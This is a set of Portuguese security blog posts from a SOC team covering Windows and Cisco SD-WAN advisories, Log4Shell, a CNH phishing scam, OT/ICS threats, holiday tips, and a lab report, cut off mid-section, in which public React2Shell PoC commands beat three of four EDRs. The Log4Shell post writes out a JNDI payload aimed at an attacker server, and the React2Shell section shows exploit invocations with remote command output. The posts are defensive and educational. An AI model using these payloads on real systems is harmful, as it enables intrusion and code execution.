Atualizações ambiente Microsoft Windows 11 / Server

As atualizações mensais da Microsoft, conhecidas como Patch Tuesday, tem uma importante função, corrigir vulnerabilidades que podem ser exploradas por atacantes para comprometer ativos de ambientes corporativos ou pessoais. A última atualização, março de 2026 é um exemplo claro dos riscos de se manter sistemas desatualizados.

Conforme o release note da atualização, corrige 79 vulnerabilidades de segurança, incluindo duas falhas zero-day divulgadas publicamente, além de vulnerabilidades críticas no Windows 11, Windows Server, Microsoft Office, SQL Server e .NET.

Em detalhe temos:

46 vulnerabilidades de Elevação de Privilégio (EoP)
18 vulnerabilidades de Execução Remota de Código (RCE)
10 vulnerabilidades de Divulgação de Informação
4 vulnerabilidades de Negação de Serviço (DoS)
4 vulnerabilidades de Spoofing
2 vulnerabilidades de Bypass de Recursos de Segurança

Pontos de atenção

Vulnerabilidades Zero-Day
Duas vulnerabilidades zero-day divulgadas publicamente, ou seja, falhas cujo funcionamento já era conhecido antes da liberação do patch.

CVE-2026-21262 – SQL Server (Elevação de Privilégio)
Permite que um usuário autenticado eleve seus privilégios para SQL Admin (sysadmin) remotamente. Essa falha pode resultar em controle total de bases de dados críticas, comprometendo confidencialidade e integridade das informações.

CVE-2026-26127 – .NET (Negação de Serviço)
Falha causada por leitura fora dos limites de memória, permitindo que um atacante cause indisponibilidade de serviços que dependem de aplicações .NET.

Vulnerabilidades Críticas no Microsoft Office

CVE-2026-26110 e CVE-2026-26113 – Microsoft Office (RCE)
Essas vulnerabilidades podem ser exploradas apenas com a visualização do arquivo no Painel de Visualização, sem que o usuário precise abrir o documento. Isso representa um risco elevado de ataques por phishing e e-mails maliciosos.

CVE-2026-26144 – Microsoft Excel (Information disclosure)
Permite vazar dados sensíveis e chamou atenção por possível exploração via Microsoft Copilot.

Elevação de Privilégio no Windows e Windows Server
A maioria das vulnerabilidades corrigidas está relacionada à elevação de privilégio, afetando componentes centrais do Windows, como:

Windows Kernel, Windows SMB Server, Winlogon e Windows DWM Core Library.

Pedro Brandt Zanqueta

Formado em Análise e Desenvolvimento de Sistemas na Fatec Rio Preto, comecei minha carreira com gerenciamento de infraestrutura terceirizada focado no Mercado Microsoft. Windows Server, Microsoft 365 e outros produtos da família foram o meu dia a dia por muitos anos. Como sempre focamos em manter os sistemas com os melhores processos de segurança, iniciamos os estudos para Cybersegurança. Pentest Profissional – Desec, Cursos do Cert.BR e certificações Palo Alto foram partes desse caminho, atualmente ao lado do time de SOC na CYLO temos o objetivo principal “Prevenir perdas”!

diario.cylo.com.br/author/pedro-brandt-zanqueta/

Alerta: Atores Maliciosos Visam Ativamente Controladores Cisco Catalyst SD-WAN

Resumo Executivo

Identificamos uma campanha global de ciberataques perpetrada por agentes maliciosos, focada na exploração de vulnerabilidades em dispositivos de rede SD-WAN (Software-Defined Wide Area Network). Os atacantes estão explorando uma falha de segurança crítica nos controladores Cisco Catalyst SD-WAN para obter acesso não autorizado e estabelecer persistência de longo prazo nas redes corporativas.

Detalhes da Ameaça no Cisco Catalyst

A vulnerabilidade central, registrada como CVE-2026-20127, consiste em um bypass de autenticação no controlador Cisco Catalyst SD-WAN. Uma vez que a exploração é bem-sucedida, os atores da ameaça conseguem adicionar um dispositivo par (peer) não autorizado à rede. Este ponto de entrada inicial é então utilizado para escalar privilégios, culminando na obtenção de acesso root ao sistema. Com esse nível de controle, os invasores podem garantir sua permanência na infraestrutura SD-WAN, representando um risco significativo e contínuo para a organização.

Métricas da Ameaça no Cisco Catalyst

A CVE-2026-20127 possui pontuação CVSS v3.1 de 10.0 (crítica), com vetor AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H.

Essa pontuação máxima reflete alto impacto em confidencialidade, integridade e disponibilidade, com exploração remota sem autenticação.

Também há uma métrica CVSS v2 de 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C).

O EPSS é de 0.976, indicando alta probabilidade (cerca de 97,6%) de exploração nos próximos 30 dias.

Esforço Coordenado de Resposta

Em resposta a esta ameaça, uma coalizão de agências internacionais de segurança cibernética, incluindo a Agência de Segurança Nacional dos EUA (NSA), a Agência de Segurança Cibernética e de Infraestrutura dos EUA (CISA), e os centros de segurança cibernética da Austrália, Canadá, Nova Zelândia e Reino Unido, publicou o Guia de Caça de Vulnerabilidade “Exploitation of Cisco SD-WAN appliances“. Este documento, fundamentado em dados de investigações reais, foi desenvolvido para auxiliar os defensores de rede na detecção e resposta às atividades maliciosas.

Versões Vulneráveis Confirmadas

As versões afetadas pela CVE-2026-20127 incluem Cisco Catalyst SD-WAN Controller (ex-vSmart) e Manager (ex-vManage) em implantações on-premise e na nuvem hospedada pela Cisco.

Antes da versão 20.9.1: Migre para uma release corrigida.
20.9 até 20.9.8.1 (corrigida em 20.9.8.2, estimada para 27/02/2026).
20.12.5 até 20.12.5.2 (corrigida em 20.12.5.3).
20.12.6 até 20.12.6.0 (corrigida em 20.12.6.1).
20.13 até 20.15.4.1 (corrigida em 20.15.4.2).
20.14 até 20.15.4.1 (corrigida em 20.15.4.2).
20.15 até 20.15.4.1 (corrigida em 20.15.4.2).
20.16 até 20.18.2.0 (corrigida em 20.18.2.1).
20.18 até 20.18.2.0 (corrigida em 20.18.2.1).

Recomendações de Mitigação

As organizações autoras do guia recomendam enfaticamente que os administradores de rede adotem as seguintes medidas imediatas:

Ação Recomendada:	Descrição:
Coleta de Artefatos	Preserve evidências cruciais, como snapshots virtuais e logs completos da tecnologia SD-WAN, para análise forense.
Aplicação de Patches	Revise os boletins de segurança da Cisco: “Cisco Catalyst SD-WAN Vulnerabilities” e “Cisco Catalyst SD-WAN Controller Authentication Bypass Vulnerability”, e aplique todas as atualizações necessárias para corrigir a vulnerabilidade CVE-2026-20127.
*Caça a Ameaças (Threat Hunting)*	Execute buscas proativas por evidências de comprometimento, seguindo as diretrizes detalhadas no Guia de Caça.
*Fortalecimento do Ambiente (Hardening)*	Implemente as melhores práticas descritas no Guia de Fortalecimento do Cisco Catalyst SD-WAN.

Diretrizes de Fortalecimento (Hardening)

O guia de hardening da Cisco oferece uma abordagem abrangente para proteger a infraestrutura SD-WAN. As principais recomendações incluem:

Controles de Perímetro de Rede: Posicione os componentes de controle atrás de um firewall, isole as interfaces da VPN 512 e utilize blocos de IP para provisionamento manual de dispositivos de borda.
Acesso ao Gerenciador SD-WAN: Substitua o certificado autoassinado da interface de usuário web por um certificado emitido por uma autoridade confiável.
Segurança do Plano de Controle e Dados: Utilize chaves par a par (pairwise keying) para aumentar a segurança da comunicação.
Tempo Limite de Sessão: Configure o tempo de inatividade da sessão para o menor período possível que não prejudique a operação.
Gerenciamento de Logs: Encaminhe todos os logs para um servidor syslog remoto e seguro para garantir a centralização e a integridade dos registros.

Referências

[1] Cisco Catalyst SD-WAN Controller Authentication Bypass Vulnerability

[2] Exploitation of Cisco SD-WAN appliances

[3] CVE-2026-20127

Adriano Cansian

Adriano Mauro Cansian, Doutor em Física Computacional e Professor Associado e pesquisador da UNESP – Universidade Estadual Paulista, possui 30 anos de experiência em pesquisa, desenvolvimento e ensino de segurança cibernética. Fundador e coordenador do Laboratório ACME! Cybersecurity Research, e revisor das revistas “Computers & Security” e “International Journal of Forensic Computer Science“, consultor e membro de vários comitês e organizações técnicas para promover a pesquisa em segurança da informação, além de atuar como voluntário em organizações de governança da Internet.

diario.cylo.com.br/author/adriano-cansian/

You’ve been Log4pwned!

Já há algum tempo venho participando do processo de Gestão de Vulnerabilidades aqui da CYLO, tem sido uma tarefa desafiadora e, por mais que cada ambiente que eu faço essa gestão tenha as suas individualidades, em quase todos os ambientes me deparo sempre com as mesmas falhas, figurinhas repetidas que estão presentes em 80% dos ambientes, a ideia de escrever esse post é totalmente baseada em descrever essas vulnerabilidades, que eu sei que existem no seu ambiente, mesmo não te conhecendo.

E para começar, não poderia ser diferente, é impossivel falar de vulnerabilidades críticas que viraram o mundo de cabeça pra baixo, sem citar a tão temida e assustadora CVE-2021-44228. Ou para os intímos Log4shell. O terror dos analistas de SOC em meados de 2021/2022 e em muitos casos, até hoje!

Se você vive em baixo de uma pedra, e não faz ideia do que estou falando, fique calmo que vou te explicar o que é a vulnerabilidade CVE-2021-44228, qual produto ela afeta, e como ela é explorada por agentes de ameaça.

Descrição da vulnerabilidade

Log4Shell (CVE-2021-44228) é uma falha na biblioteca de logging Java Log4j desenvolvida pelo Apache afetando as versões 2.0-beta9 até 2.15 (há contradições sobre o primeiro patch de correção dessa vulnerabilidade que, teóricamente foi lançada na versão 2.15 porém o patch não funcionou completamente e em alguns casos específicos ainda era possível realizar a exploração) que simplesmente permitia que QUALQUER texto logado virasse um CÓDIGO EXECUTÁVEL no servidor, mas como isso funciona?

Na prática, o Log4j permitia que mensagens de log contivessem expressões no formato ${...}, que eram interpretadas automaticamente durante o processamento do log. Uma dessas expressões era ${jndi:...}, relacionada ao JNDI, uma API do Java usado para localizar e obter objetos ou recursos em servidores externos, como serviços de diretório LDAP. Ao processar essa expressão, o Log4j realizava uma consulta ao servidor indicado e podia carregar o conteúdo retornado.

Exploração da CVE-2021-44228

Agora, entendendo onde está a falha na biblioteca Log4j presente no servidor Apache vulnerável. Quando o atacante identifica essa condição, ele passa à exploração (e acredite ele vai explorar), fazendo com que a aplicação registre em log algum dado controlado pelo atacante (como cabeçalho HTTP User-Agent ou campo de login) contendo uma expressão JNDI maliciosa, aqui vai um exemplo de uma requisição maliciosa:

${jndi:ldap://servidor-do-atacante/mimikatz.exe}.

Quando o Log4j processa esse log, ele irá interpretar a expressão ${jndi:...} e usa o JNDI para consultar o servidor LDAP do atacante, que responde com uma referência a uma classe Java remota. A JVM da aplicação então baixa e carrega essa classe, executando o código nela contido no contexto do processo vulnerável, resultando em um RCE que vai te dar pesadelos.

Relevância da vulnerabilidade CVE-2021-44228

Após entender o que é a falha representada pela CVE-2021-44228, e entender como atacantes realizam sua exploração, pergunto. Por que se preocupar tanto com essa vulnerabilidade? qual sua relevância? afinal existem milhares de outras falhas que descrevem a possibilidade de um RCE em outros produtos.

O motivo é bem simples, e preocupante. Mesmo após mais de 5 anos desde sua descoberta, a vulnerabilidade Log4Shell ainda possui um EPSS de 94.36% e um CVSS score que pessoalmente acredito que nunca irá abaixar de 10/10, dados esses que foram coletados no dia 26/02/2026, refletindo um cenário em que ainda há milhares se não milhões de aplicações vulneráveis a CVE-2021-44228, e que estão ativamente sendo explorados todos os dias, afinal é facil de explorar, em muitos casos, não necessitando de privilégios elevados, literalmente o paraíso dos Adversários.

Portanto, se quiser dormir tranquilo, certifique-se de atualizar o Log4J da sua aplicação para a versões >= 2.17.1 o quanto antes (tem que ser literalmente para ontem!). E para aqueles que chegaram agora e não fazem ideia se estão com suas aplicações vulneraváveis, não perca mais tempo, pois o atacante provavelmente já tem essa resposta, e ele não vai perder nem um segundo.

Refêrencias

CVE-2021-44228 : Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12

Known Exploited Vulnerabilities Catalog | CISA

NVD – CVE-2021-44228

Hector Carlos Frigo

Graduado em Análise e Desenvolvimento de Sistemas pela Universidade Paulista, e Pós-graduando em “Defensive Cyber Security” pela FIAP, atua como N1 no time de SOC da CYLO, é responsável por realizar a primeira análise e resposta de incidentes cibernéticos, realizou capacitações no campo de SOC/CSIRT, tendo como destaque os treinamentos promovidos pela CERT.BR em conjunto com a instituição Carnegie Mellon University “Foundations of Incident Management” e “Advanced Topics in Incident Handling”

diario.cylo.com.br/author/hector-carlos-frigo/

Regularização falsa: golpe de phishing usa CNH como isca

Na tarde de hoje, meu pai me encaminhou um e-mail sobre a suposta regularização de uma infração em sua CNH. O remetente se identificava como “Regularize CNH”, mas o endereço era claramente incomum para algo que alegava ser do gov.br: store+79974727929@g.shopifyemail.com:

Ao inspecionar melhor o conteúdo, o botão verde que prometia “resolver o problema” levava para um subdomínio que não pertence ao gov.br: regularize-cnh.myshopfy.com. A partir dessa página, o usuário é redirecionado para uma tela de pagamento em pay.cnhpagamentos.site, onde diversos detalhes entregam a fraude:

Botões para aumentar ou diminuir a quantidade de itens “Regularize” no carrinho, permitindo adicionar um número arbitrário de unidades.;
Uma seção de identificação do pagador sem qualquer autenticação ou login, algo incompatível com serviços oficiais relacionados à CNH.

Analisando o código‑fonte da página, é possível encontrar um script em JavaScript que, ao clicar no botão “GERAR PIX”, envia para o gateway de pagamento cffp.cloudfox.net um token que provavelmente identifica a conta que receberá o dinheiro. Em uma busca rápida, descobri que a Cloud Fox atua como gateway de pagamento parceiro da Shopify, plataforma conhecida por hospedar lojas de e-commerce.

Realizando uma pesquisa rápida, percebi que Cloud Fox é um gateway de pagamento parceiro da Shopfy, uma plataforma de criação e hospedagem de e-commerces.

O caso reforça o alerta para um tipo de golpe que vem se sofisticando: e‑mails de phishing explorando temas sensíveis, como CNH e multas de trânsito, para induzir pagamentos via PIX. Em situações assim, é fundamental conferir o remetente, verificar se o domínio faz sentido para o serviço citado, inspecionar para onde apontam botões e links e ficar atento a inconsistências nas páginas de destino.

Mario Lúcio Collinetti Junior

Incidentes cibernéticos no setor energético expondo fragilidades críticas em OT/ICS

Temos observado, em diferentes regiões, campanhas de ataque em larga escala direcionadas a infraestruturas de tecnologia operacional e automação (OT), sistemas de controle industrial (ICS) e dispositivos IoT empregados em geração e distribuição de energia, especialmente em ativos distribuídos como parques eólicos, usinas solares e subestações remotas.

Nesses eventos invasores exploraram vulnerabilidades antigas sem patchs, falhas de higiene de senhas e exposição indevida de dispositivos de borda, mantendo persistência prolongada na rede. Foram comprometidos endpoints remotos, firewalls e concentradores VPN expostos diretamente à internet, muitos sem autenticação multifator e com credenciais fracas.

Esses ambientes compartilham características que ampliam significativamente a superfície de ataque, incluindo dispositivos de borda expostos à internet, acesso remoto permanente por VPN, credenciais fracas ou reutilizadas, equipamentos legados com baixa cadência de atualização e integração insuficiente entre equipes de TI e automação e operação.

Os impactos mais frequentes não são necessariamente apagões imediatos, mas sim perda de telemetria, indisponibilidade de controle remoto, necessidade de operação manual de campo, substituição de equipamentos e degradação prolongada da capacidade operacional. Em cenários extremos, observa-se uso de malware destrutivo com objetivo de sabotagem e, majoritariamente, sequestro de dados.

Recomendações

Diante desse contexto, recomenda-se que organizações do setor energético e industrial adotem uma postura de defesa em profundidade específica para OT/ICS, contemplando:

1. Medidas técnicas essenciais

Autenticação multifator obrigatória para todo acesso remoto;
Segmentação rigorosa entre redes IT, OT e IoT, com zonas bem definidas;
Eliminação de exposição direta de dispositivos de borda à internet;
- Gestão contínua de vulnerabilidades e aplicação programada de patches;
Inventário completo de ativos OT, incluindo firmware e versões;
Monitoramento de integridade de endpoints, PLCs (controladoras lógicas programáveis) e gateways;
Detecção de perda de comunicação ou telemetria como indicador de incidente; e
Backups offline e planos de rápida reposição de equipamentos críticos.

2. Medidas operacionais e organizacionais

• Estabelecer SOC ou monitoramento dedicado a OT;
• Integrar feeds de threat intelligence setoriais, quando disponíveis;
• Realizar testes periódicos de resposta a incidentes e recuperação operacional;
• Desenvolver playbooks específicos para indisponibilidades;
• Realizar capacitação conjunta de equipes de TI, engenharia e automação; e
• Realizar exercícios de contingência com operação manual.

Adriano Cansian

diario.cylo.com.br/author/adriano-cansian/

Incidente como presente de Natal?

O período de festas está se aproximando e, com ele, o tão esperado “recesso de fim de ano”, época muito aguardada por trabalhadores que buscam aproveitar esse momento para passar tempo com a família e descansar. Como sempre, nem tudo são flores. Sendo assim, nesta minha abordagem, gostaria de levantar alguns alertas que devem ser considerados e que, caso sejam desprezados, podem resultar no recebimento de uma ligação desesperada do seu gestor às 3:00 da manhã, na madrugada do dia de Natal.

Menor Contingente, maiores riscos!

Neste período do ano, empresas costumam atuar com equipes reduzidas, fato que resulta em um número notavelmente menor de colaboradores ativos e capazes de identificar mudanças ou mau funcionamento dos sistemas utilizados internamente. Os atacantes sabem disso e abusam dessa situação. Afinal, quanto menos olhos voltados para ações disruptivas no sistema, maior a chance de um ataque cibernético passar despercebido.

A diminuição do contingente pode afetar diretamente o tempo de resposta dos potenciais incidentes, fazendo com que alertas se acumulem, investigações sejam postergadas e ações de contenção ocorram de maneira tardia.

Atente-se às promoções relâmpago de fim de ano!

Todo mundo já recebeu aquele e-mail de origem duvidosa informando que está ocorrendo uma promoção “imperdível” do panetone que antes custava R$ 300,00 e que, para você, sortudo(a), está agora custando “APENAS” R$ 29,99. Lembre-se: o barato pode sair caro. O número de casos de golpes, fraudes e phishing aumenta gradativamente em períodos festivos, portanto, fique alerta, desconfie!

Se não for crítico ou essencial; Desative! Desligue! Esconda!

Muitas atividades são pausadas no ambiente corporativo durante o fim do ano, por inúmeros motivos, desde a reformulação de processos internos até transições de ferramentas. Com base nisso, muitos serviços ativos, como páginas publicadas na internet e servidores com portas RDP expostas para o mundo, acabam sendo esquecidos e permanecem em operação sem o devido gerenciamento e cuidado. Lembre-se: serviços ativos esquecidos podem servir como um convite para a ceia de Natal destinada a atores maliciosos.

Aproveite o período de festas de fim de ano com menos preocupações

Seguindo alguns passos simples, é possível reduzir muito sua superfície de ataque. Isso não significa que você não sofrerá um ataque cibernético neste fim de ano, porém, ao seguir essas dicas, garanto que os riscos serão bem menores, e as chances de aproveitar as festas de fim de ano sem maiores problemas são mais favoráveis.

Desative contas de serviço que não serão utilizadas nesse período festivo
Faça uma revisão na sua rede em busca de serviços não essenciais ativos e expostos para a internet
Desconfie de promoções milagrosas, consulte a informação nos sites oficiais
Não deixe correções de vulnerabilidades para o ano que vem, pode ser tarde demais!
Não ignore os alertas de segurança, eles não são enfeites de árvore de Natal
Revise políticas de senhas de usuários e ativação de MFA

Fontes

https://securityleaders.com.br/golpes-ciberneticos-disparam-no-fim-de-ano-afirma-analise

https://exame.com/tecnologia/final-do-ano-se-consolida-como-periodo-de-maior-risco-cibernetico-no-brasil

https://www.tecmundo.com.br/seguranca/409449-cibercriminosos-intensificam-ataques-no-fim-de-ano-com-golpes-de-natal.htm

Hector Carlos Frigo

diario.cylo.com.br/author/hector-carlos-frigo/

EDRs falham em identificar e bloquear vulnerabilidade React2Shell

1. Introdução

Como já discutido em uma postagem anterior aqui no “O Diário” O React é uma biblioteca gratuita e open-source para JavaScript, amplamente utilizada na construção de interfaces web modernas. Embora originalmente projetado para execução no lado do cliente, suas versões mais recentes passaram a integrar mecanismos de renderização no servidor por meio dos React Server Components, suportados pelo React Flight Protocol. Essa adoção massiva faz com que vulnerabilidades em seu ecossistema, especialmente nas camadas server-side introduzidas recentemente, possam ter impactos significativos. É o caso da vulnerabilidade apelidada “React2Shell”, catalogada como CVE-2025-55182 pela National Vulnerability Database (NVD) em 3 de dezembro de 2025.

Este relatório tem como objetivo apresentar e demonstrar uma Prova de Conceito (PoC) pública relacionada à CVE-2025-55182, como esta pode ser explorada e o porquê de ser alarmante e crítica.

Além disso, investigamos e descobrimos que, de 4 EDRs padrões de mercado testados, 3 deles não conseguiram detectar ou bloquear o ataque.

Serão descritos:

Aspectos técnicos da vulnerabilidade;
Um método de exploração em ambiente controlado; e
Como plataformas de monitoramento são essenciais para a mitigação de ataques cibernéticos.

2. Visão Geral

A CVE-2025-55182 é uma vulnerabilidade de execução remota de código (RCE) que afeta aplicações que utilizam React Server Components por meio do React Flight Protocol, incluindo frameworks como o Next.js até a versão 16.0.6. A falha permite que um atacante execute comandos arbitrários no servidor enviando payloads maliciosos em requisições POST. A exploração ocorre devido à forma inadequada como o servidor desserializa estruturas recebidas pelo RFP: as funções responsáveis pela reconstrução dos modelos, em especial reviveModel(), não validam corretamente objetos contendo o campo __proto__ e cadeias de métodos then. Isso possibilita a introdução de um pseudo-objeto capaz de manipular o protótipo e acessar o construtor global Function, utilizado para executar comandos do sistema operacional sem autenticação ou privilégios adicionais.

2.1. Detalhes Técnicos

De acordo com indicadores oficiais, os seguintes detalhes foram levantados:

Categoria	Detalhes
Severidade	CVSS 3.x: 10.0 (Critica)
Data de publicação	3 de dezembro de 2025
Complexidade de exploração	Baixa – Requer requisição POST para um servidor vulnerável
Produto afetado	React 19, Next.js 15.0.0 a 16.0.6
Fraqueza Associada	CWE-502 – Desserialização de informação não confiável
Pontuação EPSS	1`3.40 % (em 08/12/2025) 77.80% (em 10/12/2025) 76.01% (em 11/12/2025)
Patch de correção	Pacote NPM (lançado 5 de dezembro de 2025, 06h29 UTC)
Setores Alvos	E-commerce, SaaS, Fintech, Plataformas de Streaming

2.2. Principal Vetor

O principal vetor de exploração da CVE-2025-55182 consiste no envio de requisições POST contendo payloads maliciosos que se passam por objetos válidos do React Flight Protocol. Esses payloads utilizam pseudo-objetos, incluindo estruturas manipuladas com campos como __proto__ e cadeias then, que exploram a desserialização insegura realizada pelo servidor. Ao aceitar e processar esses objetos sem validação adequada, o RFP permite que o atacante desencadeie execução arbitrária de código no ambiente server-side.

2.3. Grupos de Criminosos

Segundo a equipe de threat intelligence da Amazon, diversos atores de ameaça classificados como China-nexus, incluindo Earth Lamia e Jackpot Panda, iniciaram a exploração da CVE-2025-55182 poucas horas após sua divulgação em 3 de dezembro de 2025. Em análises de casos semelhantes envolvendo vulnerabilidades de desserialização e execução remota de código. A Unit 42 observou que esses grupos tendem a desenvolver rapidamente variantes próprias dos exploits, ajustando payloads e técnicas de obfuscar para aumentar a taxa de sucesso e reduzir a detecção. Esse padrão, já documentado pela Unit 42 em outras campanhas com perfis similares, reforça a probabilidade de múltiplos atores terem adaptado rapidamente a PoC pública para explorar React2Shell de diferentes maneiras.

3. Explorando a CVE-2025-55182

Foram utilizados 5 ambientes de laboratório, a fim de simular ambientes vulneráveis e um atacante para testar o comportamento da CVE-2025-55182 e avaliar a competência de diferentes monitoradores de dispositivos (EDRs – Endpoint Detection and Response).

Os ambientes propositalmente vulneráveis foram configurados com sistema operacional Windows 11 e utilizando a versão vulnerável Next.js 16.0.0 para o web-server, totalizando 4 ambientes com soluções de EDR distintas (os nomes dos EDRs não serão divulgados). Para simular o atacante utilizou-se o Kali Linux sem modificações.

IMPORTANTE: Note que nosso foco foi pesquisar EDRs, portanto, propositalmente, não foram utilizadas outras camadas de proteção, tais como WAF ou firewall local. Note também que o ataque não seria possível caso o Next.js já tivesse sido atualizado, ou seja, a aplicação de path é uma das camadas de segurança capaz de deter esse ataque.

Os testes e ensaios foram realizados entre os dias 8 a 12/12/2025 no laboratório ACME! Cybersecutiry Research, na UNESP de São José do Rio Preto. Todos os experimentos foram repetidos 3 vezes para verificação de erros.

3.1. Construção do Exploit e Criação do Payload

A exploração foi realizada utilizando a PoC disponibilizada publicamente no GitHub em 4 de dezembro de 2025 pelo engenheiro de software Moritz Sanft (“msanft”). A PoC é composta por um script em Python responsável por construir o payload malicioso e enviá-lo a um servidor vulnerável. O repositório também inclui a pasta test-server, contendo um ambiente mínimo baseado em Next.js com React Server Components, utilizado para demonstrar a vulnerabilidade em funcionamento

De forma resumida, as etapas adotadas no laboratório foram as seguintes:

Instalar o Node.js e Next.js, nas versões vulneráveis nos ambientes alvo, garantindo que o projeto com RSC esteja devidamente configurado.
Acessar a pasta test-server ou o diretório correspondente pelo terminal, e executar o comando ‘npm run dev’ para iniciar o servidor.
No ambiente ofensivo (Kali Linux), executar o script ‘poc.py’ fornecido na PoC, informando argumentos necessários, simulando a execução remota.

PS C:\Users\[username]\Desktop\CVE2025-55182\test-server> npm install next
up to date, audited 357 packages in 3s

141 packages are looking for funding
run `npm fund` for details

1 critical severity vulnerability

Figura 1 – Node.js indicando vulnerabilidade crítica; note que a versão utilizada está, de fato, exposta.

3.2. Execução da PoC

O script da PoC (poc.py) aceita dois argumentos chaves, endereço IPv4+Porta (por exemplo, “127.0.0.0:80”) seguido pelo comando shell desejado ou payload (“whoami” ou até um reverse shell). Durante a execução no ambiente Kali Linux, o script constrói o ‘chunk’ serializado do Flight Protocol abusando da falha de desserialização, anexando a poluição do proto e o objeto “then-ável” que dispara durante a resolução do servidor nos ambientes.

O atacante executa comandos simples, como:

$ python3 poc.py 192.168.X.X "echo teste"

$ python3 poc.py 192.168.X.X "dir"

┌─(kali@kali)-[~]
└─$ python3 PoC_react/poc.py "http://172.31.222.25:3000" "echo pwnd by sylvester"
500
:N176530853660.821
0:{"a":"$@1","f":"","b":"development"}
1:D["time":0.649100000002363Z]
1:E["digest":"pwnd by sylvester","name":"Error","message":"NEXT_REDIRECT","stack":[],"env":"Server","owner":null]

┌─(kali@kali)-[~]
└─$ python3 PoC_react/poc.py "http://172.31.222.25:3000" "dir"
500
:N176530855033Z.197
0:{"a":"$@1","f":"","b":"development"}
1:D["time":0.465700000006519]
1:E["digest":"Volume in drive C has no label.\r\n Volume Serial Number is E86C-A9DF\r\n\r\n Directory of C:\Users\fantomas\Drive\PoC-2025-5-3-mail-main\test-server\n\n 12/09/2025  04:23 PM    <DIR>                  . 12/09/2025  04:23 PM                 -0 .gitignore\r\n12/09/2025  04:28 PM           480 .gitignore\r\n12/09/2025  04:23 PM    <DIR>        next\r\n12/09/2025  04:23 PM           465 eslint.config.mjs\r\n12/09/2025  04:28 PM           257 next-env.d.ts\r\n12/09/2025  04:23 PM             1 33 next.config.ts\r\n12/09/2025  04:28 PM    <DIR>        node_modules\r\n12/09/2025  04:28 PM           227,243 package-lock.json\r\n12/09/2025  04:23 PM           567 package.json\r\n12/09/2025  04:23 PM    <DIR>        public\r\n12/09/2025  04:23 PM             1,450 README.md\r\n12/09/2025  04:23 PM             338,468 bytes\r\n12/09/2025  04:23 PM             0 File(s)    107,770,0 97,664 bytes free","name":"Error","message":"NEXT_REDIRECT","stack":[],"env":"Server","owner":null]

Figura 2 – Disparo da PoC pelo atacante

Invalid source map. Only conformant source maps can be used to find the original code. Cause: Error: sourceMap
URL could not be parsed
✖ Error: NEXT_REDIRECT
  at ignore-listed frames {
  digest: 'Volume in drive C has no label.\r\n' +
    'Volume Serial Number is E86C-A9DF\r\n' +
    '\r\n' +
    'Directory of C:\\Users\\jubaluba\\lala\\CVE-2025-55182-main\\test-server\r\n' +
    '\r\n' +
    '12/09/2025  04:28 PM    <DIR>                  .\r\n' +
    '12/09/2025  04:23 PM    <DIR>                ..\r\n' +
    '12/09/2025  04:23 PM             480 .gitignore\r\n' +
    '12/09/2025  04:28 PM    <DIR>                .next\r\n' +
    '12/09/2025  04:23 PM    <DIR>                app\r\n' +
    '12/09/2025  04:23 PM           107,113 bun.lock\r\n' +
    '12/09/2025  04:23 PM             465 eslint.config.mjs\r\n' +
    '12/09/2025  04:28 PM             257 next-env.d.ts\r\n' +
    '12/09/2025  04:23 PM             133 next.config.ts\r\n' +
    '12/09/2025  04:28 PM    <DIR>                node_modules\r\n' +
    '12/09/2025  04:28 PM           227,243 package-lock.json\r\n' +
    '12/09/2025  04:23 PM             567 package.json\r\n' +
    '12/09/2025  04:23 PM              94 postcss.config.mjs\r\n' +
    '12/09/2025  04:23 PM    <DIR>                public\r\n' +
    '12/09/2025  04:23 PM           1,450 README.md\r\n' +
    '12/09/2025  04:23 PM             666 tsconfig.json\r\n' +
    '             10 File(s)        338,468 bytes\r\n' +
    '              6 Dir(s)  107,770,097,664 bytes free'
}
POST / 500 in 43ms (compile: 4ms, render: 39ms)

Figura 3 – Execução remota no servidor

File "/usr/lib/python3/dist-packages/requests/sessions.py", line 589, in request
    resp = self.send(prep, **send_kwargs)
File "/usr/lib/python3/dist-packages/requests/sessions.py", line 703, in send
    r = adapter.send(request, **kwargs)
File "/usr/lib/python3/dist-packages/requests/adapters.py", line 682, in send
    raise ConnectionError(err, request=request)
requests.exceptions.ConnectionError: ('Connection aborted.', ConnectionResetError(104, 'Connection reset by peer'))

┌─(kali@kali)-[~]
└─$ python3 PoC_react/poc.py "http://172.31.222.21:3000" "dir" █

Figura 4 – Mensagem de erro no ambiente atacante após ser interceptado

3.4 Consideraçõe éticas e créditos

Todos os testes foram feitos em rede isolada de laboratório, com versões fora de produção (React 19.00 – 19.2.0), e divulgadas apenas após mitigação; pesquisadores devem creditar devidamente a PoC utilizada, neste caso a Moritz Sanft, e aderir divulgações similares.

O PoC de Sanft explora uma aplicação Next.js padrão (criada via create-next-app), enviando payloads em parâmetros como “0” e “1” para manipular chunks de resposta e executar comandos como “id > /tmp/pwned” via child_process.execSync. Diferente de PoCs iniciais não funcionais (como ejpir/CVE-2025-55182-poc), o código de Sanft foi amplamente adotado em scans reais, precedendo o PoC oficial de Lachlan Davidson.

O repositório oficial é https://github.com/msanft/CVE-2025-55182, contendo explicação detalhada e código completo de RCE para React Server Functions em Next.js. Foi lançado em 4 de dezembro de 2025.

4. Resultados e Observações

Nos testes realizados com os ambiente, observou-se o seguinte comportamento:

Dos 4 agentes de proteção (EDRs) testados, apenas um conseguiu detectar e impedir a atividade maliciosa em tempo real. O agente gerou alertas específicos:

O Monitorador de Rede bloqueou uma tentativa de ataque.

– A tentativa mal-intencionada Exploit.CommandInjection.299[…]

– A tentativa mal-intencionada Exploit.HTTP.CVE-2025-55182[…]

Os alertas identificaram o exploit, a CVE relacionada e o local sendo atacado, além de impedir o ataque. Para os outros 3 ambientes testados, o payload foi extraído sem qualquer alerta, demonstrando a criticidade e evidenciando a necessidade de reforçar os EDR’s com métodos de mitigação, adequados a esta vulnerabilidade, e outras camadas de segurança.

A tabela a seguir resume os resultados observados:

Ambiente	EDR/Antivírus	Execução do Ataque	Alertas?	Bloqueio?
1	EDR XPToA	Sucesso	Não	Não
2	EDR XPToB	Sucesso	Não	Não
3	EDR XPToC	Sucesso	Não	Não
4	EDR XPToD	Bloqueado	Sim	Sim

4.1. Sobre os ambientes que não perceberam qualquer atividade

Os resultados de execução imediata do comando confirmam a necessidade de apenas acessar a rede, dispensando autenticação ou elevação de privilégios, o que permite inferir que a exploração ocorre como um ponto cego nos sistemas que ainda não possuem assinaturas ou modelos de detecção ajustados para o protocolo Flight ou requisições POST em geral.

4.2 Sobre o ambiente que detectou e bloqueou o ataque

